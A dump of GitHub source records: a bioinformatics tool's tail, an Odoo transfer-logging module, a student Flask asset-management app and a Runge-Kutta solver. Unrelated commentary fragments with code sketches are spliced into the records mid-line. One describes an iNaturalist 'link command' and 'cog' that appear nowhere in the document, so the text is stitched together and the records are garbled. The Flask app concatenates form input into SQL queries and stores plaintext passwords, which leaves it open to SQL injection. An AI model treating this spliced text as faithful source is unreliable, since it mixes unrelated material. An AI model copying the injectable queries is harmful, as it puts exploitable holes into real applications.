reads file already exists, please choose another filename: \"+ self.filtered_reads_file)\n\t\t\tsys.exit(1)\n\t\t\n\t\tif self.verbose:\n\t\t\tself.logger.setLevel(logging.DEBUG)\n\t\telse:\n\t\t\tself.logger.setLevel(logging.ERROR)\n\t\t\t\n\tdef run(self):\n\t\tmlst_profile = MlstProfile(self.mlst_profile_file())\n\t\tfastas = Fastas(self.logger, self.allele_directory, self.kmer,self.divisible_by_3, max_kmers = self.max_kmers)\n\t\tfastq = Fastq(self.logger, self.input_fastq, self.kmer, fastas.get_fastas_to_kmers(), self.min_fasta_hits , mlst_profile, self.print_interval, self.output_file, self.filtered_reads_file, target_st = self.target_st, max_gap = 
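The link command above pulls an observation id out of a pasted URL with re.search; a hedged sketch of that extraction, using a hypothetical stand-in pattern (the real PAT_OBS_LINK lives in the cog's constants and is likely more permissive).

import re

PAT_OBS_LINK = re.compile(
    r"(?P<url>https?://(?:www\.)?inaturalist\.org/observations/(?P<obs_id>\d+))"
)

mat = re.search(PAT_OBS_LINK, "see https://www.inaturalist.org/observations/12345")
assert mat and int(mat["obs_id"]) == 12345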
self.max_gap, min_block_size = self.min_block_size, margin = self.margin, start_time = self.start_time, min_kmers_for_onex_pass = self.min_kmers_for_onex_pass, max_kmers = self.max_kmers)\n\t\tfastq.read_filter_and_map()\n\n\tdef mlst_profile_file(self):\n\t\tprofile_txt = os.path.join(self.allele_directory, 'profile.txt')\n\t\tif not os.path.exists(profile_txt):\n\t\t\tself.logger.error(\"The MLST profile file cannot be accessed: \"+ profile_txt)\n\t\treturn profile_txt\n\t\t","repo_name":"andrewjpage/krocus","sub_path":"krocus/Krocus.py","file_name":"Krocus.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"52"} +{"seq_id":"31164582029","text":"from odoo import fields, models, api\nfrom datetime import datetime\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT as DTF\n\n\nclass StockPicking(models.Model):\n _inherit = 'stock.picking'\n\n\n transfer_log_activity_ids = fields.One2many('transfer.log.activity','reference',string='Transfer Log Activity Ids')\n process_time = fields.Char(compute=\"_compute_process_time\", string='Processed Time', store=True, help=\"The time it takes to complete a transfer.\")\n picking_name = fields.Char(related=\"picking_type_id.name\")\n\n def create_transfer_activity_log(self):\n if self.state != 'draft':\n process_time =self._get_process_time()\n else:\n process_time = '00:00:00'\n time = str(process_time).split(':')\n total_seconds = 0\n if len(time) == 3:\n total_seconds += (float(time[0]) * 60 * 60) + (float(time[1]) * 60) + (float(time[2]))\n hours = total_seconds // 3600\n days = int(total_seconds // (24 * 3600))\n minutes = (total_seconds % 3600) // 60\n total_seconds = total_seconds % 60\n hours1 = hours + (days * 24)\n minutes1 = (hours1 * 60) + minutes\n seconds1 = (minutes1 * 60) + total_seconds\n vals = {\n 'origin': self.origin or '',\n 'timestamp': fields.datetime.now(),\n 'user': self.env.user.name,\n 'status': dict(self._fields['state'].selection).get(self.state),\n 'location': self and self.location_id.display_name,\n 'location_dest': self and self.location_dest_id.display_name,\n 'customer': self and self.partner_id and self.partner_id.name or ' ',\n 'vendor': self and self.partner_id and self.partner_id.name or ' ',\n 'days': round(seconds1 / 86400.00, 2),\n 'hours_minutes': process_time,\n 'process_time': process_time,\n 'company_id': self.company_id.id,\n 'picking_name': self.picking_name,\n 'reference': self.id or False\n }\n transfer_activity_log_id = self.env['transfer.activity.log'].create(vals)\n\n @api.multi\n @api.depends('transfer_log_activity_ids')\n def _compute_process_time(self):\n for res in self:\n total_seconds = 0\n for log_line in res.transfer_log_activity_ids:\n time = str(log_line.process_time).split(':')\n if len(time) == 3:\n total_seconds += (float(time[0]) * 60 * 60) + (float(time[1]) * 60) + (float(time[2]))\n Days = int(total_seconds // (24 * 3600))\n Hours = int(total_seconds // 3600)\n total_seconds %= 3600\n Minutes = int(total_seconds // 60)\n res.process_time = str(Days) + ' Days ' + str(Hours) + ' Hours ' + str(Minutes) + ' Minutes'\n\n\n @api.multi\n def _get_process_time(self):\n time = fields.datetime.now() - datetime.strptime(self.transfer_log_activity_ids[-1].timestamp, DTF)\n days, seconds = time.days, time.seconds\n hours = days * 24 + seconds // 3600\n minutes = (seconds % 3600) // 60\n seconds = seconds % 60\n second = str('0' + str(seconds)) if seconds < 9 else str(seconds)\n minute = str('0' + 
str(minutes)) if minutes < 9 else str(minutes)\n hour = str('0' + str(hours)) if hours < 9 else str(hours)\n return hour + ':' + minute + ':' + second\n\n\n @api.multi\n def action_confirm(self):\n res = super(StockPicking, self).action_confirm()\n self.transfer_log_action_confirm()\n return res\n\n def transfer_log_action_confirm(self):\n line_vals = []\n for rec in self:\n rec.create_transfer_activity_log()\n line_vals.append((0, 0, {'status': dict(self._fields['state'].selection).get(self.state),\n 'timestamp': fields.datetime.now(),\n 'process_time': self._get_process_time(),\n 'user':self.env.user.id,}))\n rec.transfer_log_activity_ids = line_vals\n\n\n @api.multi\n def action_prepared(self):\n res = super(StockPicking, self).action_prepared()\n self.transfer_log_action_prepared()\n return res\n\n def transfer_log_action_prepared(self):\n line_vals = []\n for rec in self:\n rec.create_transfer_activity_log()\n line_vals.append((0, 0, {'status': dict(self._fields['state'].selection).get(self.state),\n 'timestamp': fields.datetime.now(),\n 'process_time': self._get_process_time(),\n 'user': self.env.user.id, }))\n rec.transfer_log_activity_ids = line_vals\n\n\n @api.multi\n def do_transfer(self):\n res = super(StockPicking, self).do_transfer()\n self.transfer_log_action_do_new_transfer()\n return res\n\n def transfer_log_action_do_new_transfer(self):\n line_vals = []\n for rec in self:\n rec.create_transfer_activity_log()\n line_vals.append((0, 0, {'status': dict(self._fields['state'].selection).get(self.state),\n 'timestamp': fields.datetime.now(),\n 'process_time': self._get_process_time(),\n 'user': self.env.user.id, }))\n rec.transfer_log_activity_ids = line_vals\n\n @api.multi\n def action_done(self):\n res = super(StockPicking, self).action_done()\n self.transfer_log_action_done()\n self.move_lines.write({'process_time': self.process_time})\n self.pack_operation_product_ids.write({'process_time': self.process_time})\n return res\n\n def transfer_log_action_done(self):\n line_vals = []\n for rec in self:\n rec.create_transfer_activity_log()\n line_vals.append((0, 0, {'status': dict(self._fields['state'].selection).get(self.state),\n 'timestamp': fields.datetime.now(),\n 'process_time': self._get_process_time(),\n 'user': self.env.user.id, }))\n rec.transfer_log_activity_ids = line_vals\n\n @api.model\n def create(self, vals):\n res = super(StockPicking, self).create(vals)\n res.create_transfer_activity_log()\n line_vals = [(0, 0, {'status': 'Draft',\n 'timestamp': fields.datetime.now(),\n 'process_time': '00:00:00',\n 'user': self.env.user.id})]\n res.transfer_log_activity_ids = line_vals\n return res\n\nclass StockMove(models.Model):\n _inherit = 'stock.move'\n\n process_time = fields.Char(string='Processed Time', help=\"The time it takes to complete a transfer.\")\n\n\nclass StockPackOperation(models.Model):\n _inherit = 'stock.pack.operation'\n\n process_time = fields.Char(string='Processed Time', help=\"The time it takes to complete a transfer.\")","repo_name":"Muhammad-SF/Test","sub_path":"core/transfer_activity_log/model/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22304071816","text":"from flask import Flask, session, escape, render_template, request, redirect\nfrom config import dbname, dbhost, dbport, secret_key\nimport psycopg2\nfrom datetime import datetime\n\napp = Flask(__name__, template_folder='templates')\nconn = 
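The _get_process_time method above zero-pads each field by hand and only pads values below 9, so a 9 renders as "9" rather than "09"; a divmod-based sketch that pads uniformly.

from datetime import timedelta

def format_elapsed(delta: timedelta) -> str:
    # hours:minutes:seconds, always two digits per field
    total = int(delta.total_seconds())
    hours, rem = divmod(total, 3600)
    minutes, seconds = divmod(rem, 60)
    return f"{hours:02d}:{minutes:02d}:{seconds:02d}"

assert format_elapsed(timedelta(hours=1, minutes=9, seconds=9)) == "01:09:09"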
psycopg2.connect(dbname=dbname, host=dbhost)\ncur = conn.cursor()\n\n# Set secret key\napp.secret_key = secret_key\n\n# Login page: logs in user or redirects them to the create_user page if no user found\n@app.route('/', methods=['GET','POST'])\n@app.route('/login', methods=['GET','POST'])\ndef login():\n if (request.method == 'POST'):\n loginUN = request.form.get('username')\n pw = request.form.get('password')\n\n # If user provided username and password\n if ((loginUN != \"\") & (pw != \"\")):\n cur.execute(\"SELECT * FROM users WHERE users.username = \\'\" + loginUN + \"\\';\")\n user = cur.fetchone()\n\n # If username exists, check password\n if (user != None):\n if (user[4] == False):\n return render_template('error.html', error=\"User exists but is not active! Use the CLI client to set active status for \" + loginUN)\n\n # Password matches form data\n elif (user[2] == pw):\n session['username'] = loginUN\n \n # Save role in session\n cur.execute(\"SELECT roles.rolename FROM roles WHERE roles.roles_pk = \\'\" + str(user[3]) + \"\\';\")\n rolename = cur.fetchone()\n session['role'] = rolename[0]\n\n return redirect('/dashboard')\n else:\n return render_template('login.html', error=\"Incorrect password!\")\n else:\n return render_template('/login.html', error=\"User doesn't exist. Use CLI client activate_user to add a user!\")\n else:\n return render_template('login.html', error=\"Cannot log in with blank username or password. If you want to create a new user, type in any input and press login, and you will be taken to the page. Alternatively, visit localhost:8080/create_user\")\n\n return render_template('login.html', error=\" \")\n\n# Error catching route for old create_user route\n@app.route('/create_user', methods = ['GET','POST'])\ndef create_user():\n return render_template('/login.html', error=\"This route was removed as of Assignment 10. Please use the CLI client activate_user to add or activate a user in the future. Thank you for your patience and understanding\")\n\n# Route for creating new users. 
If user already exists, loads error into html\n@app.route('/activate_user', methods=['GET','POST'])\ndef activate_user():\n if (request.method == 'POST'):\n loginUN = request.form['username']\n pw = request.form['password']\n role = request.form['role']\n\n # If user provided username and password\n if ((loginUN != \"\") & (pw != \"\")):\n cur.execute(\"SELECT * FROM users WHERE users.username = \\'\" + loginUN + \"\\';\")\n user = cur.fetchone()\n\n # If user exists, update password and active status\n if (user != None):\n cur.execute(\"UPDATE users SET password = %s, isActive = True WHERE user_pk = %s\", (pw, user[0]))\n conn.commit()\n return (\"Updated user \" + user[1] + \" to active status\")\n \n # If role exists, try to find it in DB\n elif (role != None):\n cur.execute(\"SELECT * FROM roles WHERE roles.rolename = \\'\" + role + \"\\'\")\n userRole = cur.fetchone()\n \n # If not found, create it before inserting new user\n if (userRole == None):\n cur.execute(\"INSERT INTO roles (rolename) VALUES (\\'\" + role + \"\\')\")\n cur.execute(\"SELECT * FROM roles WHERE roles.rolename = \\'\" + role + \"\\'\")\n userRole = cur.fetchone()\n \n # Insert new user\n cur.execute(\"INSERT INTO users (username, password, role_fk, isActive) VALUES (%s, %s, %s, True)\", (loginUN, pw, str(userRole[0])))\n # If creating user with no role, return error\n else:\n return (\"Error: User must have a role\")\n\n # Commit changes, login user\n conn.commit()\n return (\"Successfully created user \" + loginUN)\n else:\n return (\"Error: Cannot have blank username or password!\")\n \n return render_template('error.html', error=\"This route is only used by a CLI client now. Thank you for your understanding and patience\")\n\n# Route to revoke user access\n@app.route('/revoke_user', methods=['GET','POST'])\ndef revoke_user():\n if (request.method == 'POST'):\n loginUN = request.form['username']\n\n cur.execute(\"SELECT * FROM users WHERE username = '\" + loginUN + \"';\")\n user = cur.fetchone()\n\n if (user != None):\n cur.execute(\"UPDATE users SET isActive = False WHERE user_pk = '\" + str(user[0]) + \"';\")\n conn.commit()\n return (\"Successfully revoked active status of user \" + loginUN)\n else:\n return (\"Error: User \" + loginUN + \" does not exist. Try using the activate_user CLI to add this user\")\n \n else:\n return render_template('error.html', error=\"This route is only used by a CLI client now. 
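The user lookups in these routes interpolate form input straight into SQL strings, which is injection-prone; a sketch of the same lookup with psycopg2 parameter binding, assuming the same users schema and an open connection.

def find_user(conn, username):
    # %s placeholders plus an args tuple let the driver escape input safely,
    # unlike the string concatenation used in the routes above
    with conn.cursor() as cur:
        cur.execute("SELECT * FROM users WHERE username = %s;", (username,))
        return cur.fetchone()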
Thank you for your understanding and patience\")\r\n\r\n\r\n# Route that presents incredibly simple dashboard with the user's username, and logout button\r\n@app.route('/dashboard/<message>', methods=['GET'])\r\n@app.route('/dashboard', methods=['GET'])\r\ndef dashboard(message=''):\r\n # Render different aspects of template based on user role\r\n if (session['role'] == \"Logistics Officer\"):\r\n # Select all asset tags from transfers that are in transit\r\n cur.execute(\"SELECT assets.tag, transfers.transfer_pk FROM assets, transfers WHERE (assets.assets_pk = transfers.asset_fk) AND (transfers.unload_dt IS NULL) AND (transfers.load_dt IS NOT NULL) AND (transfers.approver_fk IS NOT NULL)\")\r\n transfers = cur.fetchall()\r\n\r\n # Select all asset tags from transfers that are not in transit yet\r\n cur.execute(\"SELECT assets.tag, transfers.transfer_pk FROM assets, transfers WHERE (assets.assets_pk = transfers.asset_fk) AND (transfers.load_dt IS NULL) AND (transfers.approver_fk IS NOT NULL)\")\r\n loadedTransfers = cur.fetchall()\r\n\r\n # Render template with both assets in transit and assets waiting on being loaded\r\n return render_template('dashboard.html', username=session['username'],role=session['role'], message=message, transfers=transfers, loadedTransfers=loadedTransfers)\r\n elif (session['role'] == \"Facilities Officer\"):\r\n # Select all transfers still needing approval\r\n cur.execute(\"SELECT assets.tag, facilities.name, transfers.transfer_pk FROM assets, facilities, transfers WHERE (assets.assets_pk = transfers.asset_fk) AND (facilities.facility_pk = transfers.dest_fk) AND (transfers.approver_fk IS NULL)\")\r\n transfers = cur.fetchall()\r\n return render_template('dashboard.html', username=session['username'], role=session['role'], message=message, transfers=transfers)\r\n \r\n return render_template('dashboard.html', username=session['username'], role=session['role'], message=message)\r\n\r\n# Route to add a facility\r\n@app.route('/add_facility', methods=['GET','POST'])\r\ndef add_facility(error=\"\"):\r\n # If just visiting page\r\n if (request.method == 'GET'):\r\n # Get all existing facilities from the DB\r\n cur.execute(\"SELECT * FROM facilities;\")\r\n facilities = cur.fetchall()\r\n # Load them into the page\r\n return render_template('add_facility.html', facilities=facilities, error=error)\r\n \r\n # If adding a facility\r\n elif (request.method == 'POST'):\r\n # Get form data\r\n facilityName = request.form.get('facilityName')\r\n facilityCode = request.form.get('facilityCode')\r\n\r\n # Get the facility with that name\r\n cur.execute(\"SELECT * FROM facilities WHERE (name = \\'\" + facilityName + \"\\' OR code = \\'\" + facilityCode + \"\\')\")\r\n facility = cur.fetchone()\r\n\r\n # Facility already exists\r\n if (facility != None):\r\n return render_template('error.html',error=\"Facility already exists!\")\r\n # If facility doesn't exist yet, add to the DB\r\n else:\r\n cur.execute(\"INSERT INTO facilities (name, code) VALUES (%s, %s)\", (facilityName, facilityCode))\r\n conn.commit()\r\n return redirect('/add_facility')\r\n\r\n# Route to add an asset\r\n@app.route('/add_asset', methods=['GET','POST'])\r\ndef add_asset():\r\n # If visiting page\r\n if (request.method == 'GET'):\r\n # Get all the facility names\r\n cur.execute(\"SELECT name FROM facilities;\")\r\n facilityNames = cur.fetchall()\r\n # Get all current assets\r\n cur.execute(\"SELECT * FROM assets;\")\r\n assets = cur.fetchall()\r\n # And load them into the page\r\n return render_template('add_asset.html', facilities=facilityNames, assets=assets)\r\n \r\n # If trying to add an asset\r\n elif (request.method == 'POST'):\r\n # Get form data\r\n assetTag 
= request.form.get('assetTag')\r\n assetDesc = request.form.get('assetDesc')\r\n facilityName = request.form.get('facility')\r\n rawtime = request.form.get('date')\r\n dtobj = datetime.strptime(rawtime, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\r\n\r\n # Get asset with same tag, if any\r\n cur.execute(\"SELECT * FROM assets WHERE tag = \\'\" + assetTag + \"\\'\")\r\n asset = cur.fetchone()\r\n\r\n # If found asset with the same tag already, error\r\n if (asset != None):\r\n return render_template('error.html', error=\"Asset with tag \" + assetTag + \" already exists!\")\r\n \r\n # Otherwise add this asset to the DB\r\n else: \r\n cur.execute(\"SELECT facility_pk FROM facilities WHERE facilities.name = \\'\" + facilityName + \"\\'\")\r\n facilityFK = cur.fetchone()\r\n cur.execute(\"INSERT INTO assets (tag, description, facility_fk, arrival_dt) VALUES (%s, %s, %s, %s)\", (assetTag, assetDesc, facilityFK, dtobj))\r\n conn.commit()\r\n return redirect('/add_asset')\r\n\r\n# Route to dispose of an asset\r\n@app.route('/dispose_asset', methods=['GET','POST'])\r\ndef dispose_asset():\r\n # Get logged in user's UN\r\n loginUN = session['username']\r\n role = session['role']\r\n\r\n # If they don't have the correct role, error\r\n if (role != \"Logistics Officer\"):\r\n return render_template(\"error.html\", error=\"User's role must be Logistics Officer in order to modify assets\")\r\n \r\n # If visiting page, load vanilla page\r\n elif (request.method == 'GET'):\r\n cur.execute(\"SELECT * FROM assets\")\r\n assets = cur.fetchall()\r\n return render_template('dispose_asset.html', assets=assets)\r\n \r\n # If trying to dispose of an asset\r\n elif (request.method == 'POST'):\r\n # Get form data\r\n tag = request.form.get('assetTag')\r\n rawdt = request.form.get('date')\r\n dtobj = datetime.strptime(rawdt, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\r\n\r\n # Find asset to dispose of\r\n cur.execute(\"SELECT * FROM assets WHERE assets.tag = \\'\" + tag + \"\\'\")\r\n asset = cur.fetchone()\r\n\r\n # If asset found\r\n if (asset != None):\r\n # If it is already disposed of, error\r\n if (asset[3] == None):\r\n return render_template('error.html', error=\"Asset already disposed\")\r\n # Else, update with disposed facility (NULL) and form date\r\n else:\r\n cur.execute(\"UPDATE assets SET dispose_dt = %s WHERE assets.tag = %s\", (dtobj, tag))\r\n # Asset not found, error\r\n else:\r\n return render_template('error.html', error=\"Asset does not exist!\")\r\n\r\n # Save changes and redirect to dashboard\r\n conn.commit()\r\n return redirect('/dashboard')\r\n\r\n# Route to report assets from a given day\r\n@app.route('/asset_report', methods=['GET','POST'])\r\ndef asset_report():\r\n # Get facility names for loading into page\r\n cur.execute(\"SELECT facilities.name FROM facilities\")\r\n facilityNames = cur.fetchall()\r\n\r\n # If visiting page, load page\r\n if (request.method == 'GET'):\r\n return render_template('asset_report.html', facilities=facilityNames)\r\n \r\n # If generating a report\r\n elif (request.method == 'POST'):\r\n # Get form data\r\n facility = request.form.get('facility')\r\n rawdate = request.form.get('date')\r\n dtobj = datetime.strptime(rawdate, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\r\n print (dtobj)\r\n\r\n # If no facility indicated, load all assets from DB where arrival date is BEFORE date on form (already arrived)\r\n if (facility == \"All\"):\r\n cur.execute(\"SELECT * FROM assets WHERE (assets.arrival_dt <= %s) AND (assets.dispose_dt IS NULL OR assets.dispose_dt > %s)\", (dtobj, dtobj))\r\n \r\n # Else do above only with assets from given facility\r\n else:\r\n cur.execute(\"SELECT facilities.facility_pk FROM facilities WHERE facilities.name = \\'\" + facility + \"\\'\")\r\n 
fpk = cur.fetchone()\r\n cur.execute(\"SELECT * FROM assets WHERE (assets.arrival_dt <= %s AND assets.facility_fk = %s AND (assets.dispose_dt IS NULL OR assets.dispose_dt > %s))\", (dtobj, fpk, dtobj))\r\n\r\n # Load report results and facility names into the page\r\n assets = cur.fetchall()\r\n print (assets)\r\n return render_template('asset_report.html', assets=assets, facilities=facilityNames, facility=facility, date=dtobj)\r\n\r\n# Route to initiate transit requests\r\n@app.route('/transfer_req', methods=['GET','POST'])\r\ndef transfer_req():\r\n # Verify user is a Logistics Officer\r\n if (session['role'] != \"Logistics Officer\"):\r\n return render_template('error.html', error=\"Must be a Logistics Officer to initiate transfer requests!\")\r\n \r\n # Display assets available to be transferred\r\n elif (request.method == \"GET\"):\r\n cur.execute(\"SELECT facilities.name FROM facilities\")\r\n facilities = cur.fetchall()\r\n cur.execute(\"SELECT assets.tag, facilities.name FROM assets, facilities WHERE assets.facility_fk = facilities.facility_pk\")\r\n assets = cur.fetchall()\r\n return render_template('transfer_req.html', facilities=facilities, assets=assets)\r\n \r\n # If user requested a transfer\r\n elif (request.method == \"POST\"):\r\n # Check validity of asset tag (kept as text input instead of select options since it sounded \r\n # like some kind of input validation was needed)\r\n tag = request.form.get('tag')\r\n cur.execute(\"SELECT * FROM assets WHERE assets.tag = \\'\" + tag + \"\\';\")\r\n asset = cur.fetchone()\r\n if (asset == None):\r\n return render_template('error.html', error=\"Error: Asset tag does not exist!\")\r\n \r\n source = request.form.get('source')\r\n dest = request.form.get('dest')\r\n\r\n # If user tries to transfer asset to the same facility\r\n if (source == dest):\r\n return render_template('error.html', error=\"Source and destination cannot be the same facility!\")\r\n\r\n # Since facilities are loaded into select from DB, they must be valid, no validation necessary\r\n cur.execute(\"SELECT facilities.facility_pk FROM facilities WHERE facilities.name = \\'\" + source + \"\\';\")\r\n source_fk = cur.fetchone()\r\n\r\n # If asset is not saved as being in the facility transferred FROM\r\n if (asset[3] != source_fk[0]):\r\n return render_template('error.html', error=\"Asset is not at the source facility!\")\r\n \r\n cur.execute(\"SELECT facilities.facility_pk FROM facilities WHERE facilities.name = \\'\" + dest + \"\\';\")\r\n dest_fk = cur.fetchone()\r\n\r\n # Get current time\r\n curdt = datetime.now()\r\n\r\n cur.execute(\"SELECT users.user_pk FROM users WHERE users.username = \\'\" + session['username'] + \"\\';\")\r\n user = cur.fetchone()\r\n\r\n # Insert transfer request into table and commit\r\n cur.execute(\"INSERT INTO transfers (requester_fk, submit_dt, source_fk, dest_fk, asset_fk) VALUES (%s, %s, %s, %s, %s)\", (user[0], curdt, source_fk[0], dest_fk[0], asset[0]))\r\n conn.commit()\r\n\r\n return render_template(\"success.html\", message=\"Transfer request for asset \" + tag + \" successfully submitted\") \r\n\r\n# Route to approve of transit requests\r\n@app.route('/approve_req/<int:transfer_pk>', methods=['GET'])\r\n@app.route('/approve_req/<int:transfer_pk>/<approve>', methods=['POST'])\r\ndef approve_req(transfer_pk=-1, approve=\"True\"):\r\n # Verify user is a Facilities Officer\r\n if (session['role'] != \"Facilities Officer\"):\r\n return render_template('error.html', error=\"Must be a Facilities Officer to approve assets!\")\r\n # Verify transfer_pk is valid\r\n elif (request.method == 'GET'):\r\n if (transfer_pk == -1):\r\n return render_template('error.html', error=\"Invalid transfer key! 
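Every route in this app repeats the same session['role'] gate inline; a sketch of a hypothetical decorator that would consolidate those checks (requires_role is not part of the original app).

from functools import wraps
from flask import render_template, session

def requires_role(role):
    def decorator(view):
        @wraps(view)
        def wrapped(*args, **kwargs):
            # mirror the inline checks: a wrong role short-circuits to the error page
            if session.get('role') != role:
                return render_template('error.html',
                                       error=f"Must be a {role} to use this page!")
            return view(*args, **kwargs)
        return wrapped
    return decorator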
Transfer is not logged in the database!\")\r\n else:\r\n cur.execute(\"SELECT assets.tag, facilities.name, transfers.transfer_pk FROM assets, facilities, transfers WHERE (transfers.transfer_pk = \\'\" + str(transfer_pk) + \"\\') AND (assets.assets_pk = transfers.asset_fk) AND (facilities.facility_pk = transfers.dest_fk)\")\r\n transfer = cur.fetchone()\r\n return render_template('approve_req.html', transfer=transfer)\r\n # If Facilities Officer approved/disapproved of transfer\r\n elif (request.method == 'POST'):\r\n # If transfer is approved, update DB with approving user and datetime of approval\r\n if (approve == \"True\"):\r\n cur.execute(\"SELECT user_pk FROM users WHERE users.username = \\'\" + session['username'] + \"\\';\")\r\n user_pk = cur.fetchone()[0]\r\n cur.execute(\"UPDATE transfers SET approver_fk = %s, approve_dt = %s WHERE transfers.transfer_pk = %s\", (user_pk, datetime.now(), transfer_pk))\r\n message = \"Transfer approved\"\r\n # If transfer is not approved, remove it from the DB\r\n else:\r\n cur.execute(\"DELETE FROM transfers WHERE transfers.transfer_pk = \\'\" + str(transfer_pk) + \"\\';\")\r\n message = \"Transfer removed from database\"\r\n # Regardless of approval, save DB changes and redirect to dashboard\r\n conn.commit()\r\n return redirect('/dashboard/' + message)\r\n\r\n# Route to set the load and unload times of approved transfer requests\r\n@app.route('/update_transit/<int:transfer_pk>', methods=['GET', 'POST'])\r\ndef update_transit(transfer_pk = -1):\r\n # Only allow Logistics Officers to use this route\r\n if (session['role'] != \"Logistics Officer\"):\r\n return render_template('error.html', error=\"Only Logistics Officers can update load and unload times!\")\r\n # Verify transfer_pk is valid\r\n elif (request.method == 'GET'):\r\n if (transfer_pk == -1):\r\n return render_template('error.html', error=\"Invalid transfer key! 
Transfer does not exist in the database!\")\r\n else:\r\n # Generate and display asset tag, source and dest facility for transfer\r\n cur.execute(\"SELECT assets.tag, facilities.name, transfer_pk, transfers.load_dt FROM assets, facilities, transfers WHERE (transfers.transfer_pk = \\'\" + str(transfer_pk) + \"\\') AND (assets.assets_pk = transfers.asset_fk) AND (facilities.facility_pk = transfers.dest_fk)\")\r\n transfer = cur.fetchone()\r\n cur.execute(\"SELECT facilities.name FROM facilities, transfers WHERE (transfers.transfer_pk = \\'\" + str(transfer_pk) + \"\\') AND (facilities.facility_pk = transfers.source_fk)\")\r\n source = cur.fetchone()[0]\r\n return render_template('update_transit.html', transfer=transfer, source=source)\r\n # Updated load/unload time\r\n elif (request.method == 'POST'):\r\n # If request was for updating load, update load time\r\n if (request.form.get('load_dt')):\r\n rawLDT = request.form.get('load_dt')\r\n load_dt = datetime.strptime(rawLDT, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\r\n cur.execute(\"UPDATE transfers SET load_dt = %s WHERE transfers.transfer_pk = %s\", (load_dt, transfer_pk))\r\n message = \"Transfer load time recorded\"\r\n # If request was for updating unload, update unload time\r\n elif (request.form.get('unload_dt')):\r\n rawUDT = request.form.get('unload_dt')\r\n unload_dt = datetime.strptime(rawUDT, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\r\n cur.execute(\"UPDATE transfers SET unload_dt = %s WHERE transfers.transfer_pk = %s\", (unload_dt, transfer_pk))\r\n message = \"Transfer unload time recorded\"\r\n \r\n # Commit changes and redirect to the dashboard\r\n conn.commit()\r\n return redirect(\"/dashboard/\" + message)\r\n\r\n# Route for a transfer report of all assets in transit\r\n@app.route('/transfer_report', methods=['GET','POST'])\r\ndef transfer_report():\r\n # Render template without results\r\n if (request.method == 'GET'):\r\n return render_template('transfer_report.html')\r\n # Generate results list and render template with results\r\n elif (request.method == 'POST'):\r\n rawdt = request.form.get('date')\r\n dtobj = datetime.strptime(rawdt, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\r\n\r\n # Add to results if transfer load <= dtobj, and transfer unload >= dtobj\r\n cur.execute(\"SELECT assets.tag, transfers.load_dt, transfers.unload_dt FROM assets, transfers WHERE (transfers.load_dt <= %s) AND (transfers.unload_dt >= %s) AND (transfers.asset_fk = assets.assets_pk)\", (dtobj, dtobj))\r\n results = cur.fetchall()\r\n\r\n return render_template('transfer_report.html', results=results)\r\n\r\n# Logs user out of the session and returns them to the login screen\r\n@app.route('/logout', methods=['GET','POST'])\r\ndef logout():\r\n session.pop('username', None)\r\n return render_template('/login.html', error=\"Successfully logged out!\")\r\n\r\n\r\n","repo_name":"238alexg/322","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":21827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72544826085","text":"class RungeKutta:\n\n def __init__(self, delta_t):\n self.v0 = 5.0 # initial velocity (m/s)\n self.y0 = 200.0 # initial position (m)\n self.k = 0.25 # drag proportionality constant (kg/s)\n self.m = 2 # mass (kg)\n self.g = 10 # gravitational acceleration (m/s^2)\n self.delta_t = delta_t\n\n \n def pontos_criticos(self):\n tempo = 0.0 # holds the elapsed time from 0 s up to the particle's current instant\n v_ant = self.v0 # holds the velocity at each iteration\n y_ant = self.y0 # holds the height at each iteration\n y_atual = y_ant\n\n 
while(y_atual > 0): # loop until the height is close enough to 0 m (sea level)\n v_atual, y_atual = self.sol_aproximada(v_ant, y_ant)\n tempo = tempo + self.delta_t\n\n if(v_atual*v_ant < 0): # maximum height: v(t) = 0 m/s\n if(y_ant > y_atual):\n y_alt_max = y_ant # maximum height of the trajectory\n t_alt_max = tempo - self.delta_t # time at which maximum height was reached\n else:\n y_alt_max = y_atual # maximum height of the trajectory\n t_alt_max = tempo # time at which maximum height was reached\n \n if(y_atual*y_ant < 0): # end of the trajectory: y(t) = 0 m\n v_mar = v_ant # velocity on reaching the sea\n t_mar = tempo - self.delta_t # total trajectory time\n\n v_ant = v_atual\n y_ant = y_atual\n \n return y_alt_max, t_alt_max, v_mar, t_mar\n\n \n def auxiliar1(self, v_ant):\n result1 = [0] * 2 # index 0: velocity, index 1: height\n\n # Equation 47\n result1[0] = -self.g - ((self.k/self.m)*v_ant)\n result1[1] = v_ant\n\n return result1\n\n \n def auxiliar2(self, v_ant):\n auxiliar1 = self.auxiliar1(v_ant)\n\n # Equation 48\n v_aux2 = v_ant + (self.delta_t/2)*auxiliar1[0]\n \n # Equation 49\n result2 = self.auxiliar1(v_aux2) # index 0: velocity, index 1: height\n\n return result2\n\n \n def auxiliar3(self, v_ant):\n auxiliar1 = self.auxiliar1(v_ant)\n auxiliar2 = self.auxiliar2(v_ant)\n\n # Equation 50\n v_aux3 = v_ant + self.delta_t*(-auxiliar1[0] + 2*auxiliar2[0])\n\n # Equation 51\n result3 = self.auxiliar1(v_aux3) # index 0: velocity, index 1: height\n\n return result3\n\n \n def sol_aproximada(self, v_ant, y_ant):\n auxiliar1 = self.auxiliar1(v_ant)\n auxiliar2 = self.auxiliar2(v_ant)\n auxiliar3 = self.auxiliar3(v_ant)\n\n result = [0] * 2 # index 0: velocity, index 1: height\n\n # Equation 52\n result[0] = v_ant + self.delta_t*((auxiliar1[0] + 4*auxiliar2[0] + auxiliar3[0])/6)\n result[1] = y_ant + self.delta_t*((auxiliar1[1] + 4*auxiliar2[1] + auxiliar3[1])/6)\n\n return result[0], result[1] ","repo_name":"leosilva99/trabalhos_MN2","sub_path":"trabalho17_mn2/RungeKutta.py","file_name":"RungeKutta.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 